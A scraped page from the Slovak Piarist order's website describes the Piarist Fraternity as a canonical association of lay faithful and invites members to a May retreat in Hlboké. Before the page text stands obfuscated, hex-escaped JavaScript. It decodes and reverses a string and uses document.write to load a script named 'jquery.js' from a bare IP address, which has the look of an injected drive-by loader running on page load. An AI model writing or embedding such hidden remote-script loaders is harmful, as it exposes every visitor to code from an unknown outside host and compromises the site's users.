var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0])) Piaristická fraternita na Slovensku | Rehoľa piaristov na Slovensku

Piaristická fraternita na Slovensku


Piaristická fraternita na Slovensku, ďalej len ,,Fraternita”, je podľa kánonov 303 a 312 Kódexu kánonického práva verejným združením veriacich, ktorí vedú apoštolský život a snažia sa o kresťanskú dokonalosť, ako prejav charizmatickej spolupráce laikov a rehoľníkov Rehole piaristov na Slovensku.

Pozývame všetkých členov a priateľov Piaristickej fraternity na Slovensku na chatu v Hlbokom (okr. Prievidza) v termíne 19. – 21. máj. Témou chaty bude modlitba, život sv. Jozefa Kalazanského a spoločenstvo. Veľmi sa na vás tešíme. Ak máte otázky, môžete nám ich napísať na fraternita@piaristi.sk